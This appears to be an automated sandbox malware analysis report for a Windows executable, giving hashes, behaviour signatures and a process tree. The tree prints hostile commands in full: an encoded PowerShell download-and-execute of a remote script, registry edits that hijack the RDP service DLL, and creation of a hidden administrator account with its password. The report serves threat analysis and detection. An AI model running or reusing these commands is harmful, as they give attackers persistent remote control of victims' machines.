Analysis
-
max time kernel
273s -
max time network
292s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
08-06-2021 15:58
Static task
static1
Behavioral task
behavioral1
Sample
2fd6796fd158c93b14654240533511af6fec03e5.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
2fd6796fd158c93b14654240533511af6fec03e5.exe
Resource
win10v20210408
General
-
Target
2fd6796fd158c93b14654240533511af6fec03e5.exe
-
Size
6.0MB
-
MD5
20f307c716a689f4afa3a76b7143db22
-
SHA1
2fd6796fd158c93b14654240533511af6fec03e5
-
SHA256
3647e2dc4336b2eeb828371821c706a329dce645cb16f9c1c31c3faeae8f56dd
-
SHA512
0a8d1b2d0cbd3860df907eb692aa2d775f021822b4d856c051d84e8056a2c1cf893bab68f471b69db0615341dd2dfe78dfac1b79d2239217cfbdf71bfb84061b
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 18 2248 powershell.exe 20 2248 powershell.exe 21 2248 powershell.exe 22 2248 powershell.exe 24 2248 powershell.exe 26 2248 powershell.exe 28 2248 powershell.exe 30 2248 powershell.exe 32 2248 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 2368 2368 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI3D9.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI489.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_1iimm3bo.pbt.ps1 powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI447.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI477.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI488.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_kioftf2k.g14.psm1 powershell.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\2ba02e083fadee33 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c004900450035005f00550041005f004200610063006b00750070005f0046006c00610067002c0000000100080035002e0030000000000000000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 6ead5207ab2cd701 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1400 = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 20 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 22 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 1628 powershell.exe 1628 powershell.exe 1628 powershell.exe 1968 powershell.exe 1968 powershell.exe 1968 powershell.exe 1448 powershell.exe 1448 powershell.exe 1448 powershell.exe 2860 powershell.exe 2860 powershell.exe 2860 powershell.exe 2248 powershell.exe 2248 powershell.exe 2248 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 624 624 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2860 powershell.exe Token: SeDebugPrivilege 1628 powershell.exe Token: SeIncreaseQuotaPrivilege 1628 powershell.exe Token: SeSecurityPrivilege 1628 powershell.exe Token: SeTakeOwnershipPrivilege 1628 powershell.exe Token: SeLoadDriverPrivilege 1628 powershell.exe Token: SeSystemProfilePrivilege 1628 powershell.exe Token: SeSystemtimePrivilege 1628 powershell.exe Token: SeProfSingleProcessPrivilege 1628 powershell.exe Token: SeIncBasePriorityPrivilege 1628 powershell.exe Token: SeCreatePagefilePrivilege 1628 powershell.exe Token: SeBackupPrivilege 1628 powershell.exe Token: SeRestorePrivilege 1628 powershell.exe Token: SeShutdownPrivilege 1628 powershell.exe Token: SeDebugPrivilege 1628 powershell.exe Token: SeSystemEnvironmentPrivilege 1628 powershell.exe Token: SeRemoteShutdownPrivilege 1628 powershell.exe Token: SeUndockPrivilege 1628 powershell.exe Token: SeManageVolumePrivilege 1628 powershell.exe Token: 33 1628 powershell.exe Token: 34 1628 powershell.exe Token: 35 1628 powershell.exe Token: 36 1628 powershell.exe Token: SeDebugPrivilege 1968 powershell.exe Token: SeIncreaseQuotaPrivilege 1968 powershell.exe Token: SeSecurityPrivilege 1968 powershell.exe Token: SeTakeOwnershipPrivilege 1968 powershell.exe Token: SeLoadDriverPrivilege 1968 powershell.exe Token: SeSystemProfilePrivilege 1968 powershell.exe Token: SeSystemtimePrivilege 1968 powershell.exe Token: SeProfSingleProcessPrivilege 1968 powershell.exe Token: SeIncBasePriorityPrivilege 1968 powershell.exe Token: SeCreatePagefilePrivilege 1968 powershell.exe Token: SeBackupPrivilege 1968 powershell.exe Token: SeRestorePrivilege 1968 powershell.exe Token: SeShutdownPrivilege 1968 powershell.exe Token: SeDebugPrivilege 1968 powershell.exe Token: SeSystemEnvironmentPrivilege 1968 powershell.exe Token: SeRemoteShutdownPrivilege 1968 powershell.exe Token: SeUndockPrivilege 1968 powershell.exe Token: SeManageVolumePrivilege 1968 powershell.exe Token: 33 1968 powershell.exe Token: 34 1968 powershell.exe Token: 35 1968 powershell.exe Token: 36 1968 powershell.exe Token: SeDebugPrivilege 1448 powershell.exe Token: SeIncreaseQuotaPrivilege 1448 powershell.exe Token: SeSecurityPrivilege 1448 powershell.exe Token: SeTakeOwnershipPrivilege 1448 powershell.exe Token: SeLoadDriverPrivilege 1448 powershell.exe Token: SeSystemProfilePrivilege 1448 powershell.exe Token: SeSystemtimePrivilege 1448 powershell.exe Token: SeProfSingleProcessPrivilege 1448 powershell.exe Token: SeIncBasePriorityPrivilege 1448 powershell.exe Token: SeCreatePagefilePrivilege 1448 powershell.exe Token: SeBackupPrivilege 1448 powershell.exe Token: SeRestorePrivilege 1448 powershell.exe Token: SeShutdownPrivilege 1448 powershell.exe Token: SeDebugPrivilege 1448 powershell.exe Token: SeSystemEnvironmentPrivilege 1448 powershell.exe Token: SeRemoteShutdownPrivilege 1448 powershell.exe Token: SeUndockPrivilege 1448 powershell.exe Token: SeManageVolumePrivilege 1448 powershell.exe Token: 33 1448 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2fd6796fd158c93b14654240533511af6fec03e5.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 736 wrote to memory of 2860 736 2fd6796fd158c93b14654240533511af6fec03e5.exe powershell.exe PID 736 wrote to memory of 2860 736 2fd6796fd158c93b14654240533511af6fec03e5.exe powershell.exe PID 2860 wrote to memory of 3812 2860 powershell.exe csc.exe PID 2860 wrote to memory of 3812 2860 powershell.exe csc.exe PID 3812 wrote to memory of 1316 3812 csc.exe cvtres.exe PID 3812 wrote to memory of 1316 3812 csc.exe cvtres.exe PID 2860 wrote to memory of 1628 2860 powershell.exe powershell.exe PID 2860 wrote to memory of 1628 2860 powershell.exe powershell.exe PID 2860 wrote to memory of 1968 2860 powershell.exe powershell.exe PID 2860 wrote to memory of 1968 2860 powershell.exe powershell.exe PID 2860 wrote to memory of 1448 2860 powershell.exe powershell.exe PID 2860 wrote to memory of 1448 2860 powershell.exe powershell.exe PID 2860 wrote to memory of 2572 2860 powershell.exe reg.exe PID 2860 wrote to memory of 2572 2860 powershell.exe reg.exe PID 2860 wrote to memory of 728 2860 powershell.exe reg.exe PID 2860 wrote to memory of 728 2860 powershell.exe reg.exe PID 2860 wrote to memory of 2832 2860 powershell.exe reg.exe PID 2860 wrote to memory of 2832 2860 powershell.exe reg.exe PID 2860 wrote to memory of 504 2860 powershell.exe net.exe PID 2860 wrote to memory of 504 2860 powershell.exe net.exe PID 504 wrote to memory of 3628 504 net.exe net1.exe PID 504 wrote to memory of 3628 504 net.exe net1.exe PID 2860 wrote to memory of 2128 2860 powershell.exe cmd.exe PID 2860 wrote to memory of 2128 2860 powershell.exe cmd.exe PID 2128 wrote to memory of 3176 2128 cmd.exe cmd.exe PID 2128 wrote to memory of 3176 2128 cmd.exe cmd.exe PID 3176 wrote to memory of 2304 3176 cmd.exe net.exe PID 3176 wrote to memory of 2304 3176 cmd.exe net.exe PID 2304 wrote to memory of 780 2304 net.exe net1.exe PID 2304 wrote to memory of 780 2304 net.exe net1.exe PID 2860 wrote to memory of 1060 2860 powershell.exe cmd.exe PID 2860 wrote to memory of 1060 2860 powershell.exe cmd.exe PID 1060 wrote to memory of 2588 1060 cmd.exe cmd.exe PID 1060 wrote to memory of 2588 1060 cmd.exe cmd.exe PID 2588 wrote to memory of 3172 2588 cmd.exe net.exe PID 2588 wrote to memory of 3172 2588 cmd.exe net.exe PID 3172 wrote to memory of 776 3172 net.exe net1.exe PID 3172 wrote to memory of 776 3172 net.exe net1.exe PID 3636 wrote to memory of 1204 3636 cmd.exe net.exe PID 3636 wrote to memory of 1204 3636 cmd.exe net.exe PID 1204 wrote to memory of 2832 1204 net.exe net1.exe PID 1204 wrote to memory of 2832 1204 net.exe net1.exe PID 4072 wrote to memory of 2592 4072 cmd.exe net.exe PID 4072 wrote to memory of 2592 4072 cmd.exe net.exe PID 2592 wrote to memory of 2308 2592 net.exe net1.exe PID 2592 wrote to memory of 2308 2592 net.exe net1.exe PID 2264 wrote to memory of 1968 2264 cmd.exe net.exe PID 2264 wrote to memory of 1968 2264 cmd.exe net.exe PID 1968 wrote to memory of 3960 1968 net.exe net1.exe PID 1968 wrote to memory of 3960 1968 net.exe net1.exe PID 2732 wrote to memory of 416 2732 cmd.exe net.exe PID 2732 wrote to memory of 416 2732 cmd.exe net.exe PID 416 wrote to memory of 3920 416 net.exe net1.exe PID 416 wrote to memory of 3920 416 net.exe net1.exe PID 3200 wrote to memory of 2248 3200 cmd.exe net.exe PID 3200 wrote to memory of 2248 3200 cmd.exe net.exe PID 2248 wrote to memory of 1688 2248 net.exe net1.exe PID 2248 wrote to memory of 1688 2248 net.exe net1.exe PID 1568 wrote to memory of 1012 1568 cmd.exe net.exe PID 1568 wrote to memory of 1012 1568 cmd.exe net.exe PID 1012 wrote to memory of 3452 1012 net.exe net1.exe PID 1012 wrote to memory of 3452 1012 net.exe net1.exe PID 728 wrote to memory of 200 728 cmd.exe WMIC.exe PID 728 wrote to memory of 200 728 cmd.exe WMIC.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2fd6796fd158c93b14654240533511af6fec03e5.exe"C:\Users\Admin\AppData\Local\Temp\2fd6796fd158c93b14654240533511af6fec03e5.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vs1ezoe0\vs1ezoe0.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAC53.tmp" "c:\Users\Admin\AppData\Local\Temp\vs1ezoe0\CSC29E85CA2AA6F4C6ABF3767A694F2658A.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc uJsRDLdG /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc uJsRDLdG /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc uJsRDLdG /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc uJsRDLdG1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc uJsRDLdG2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc uJsRDLdG3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
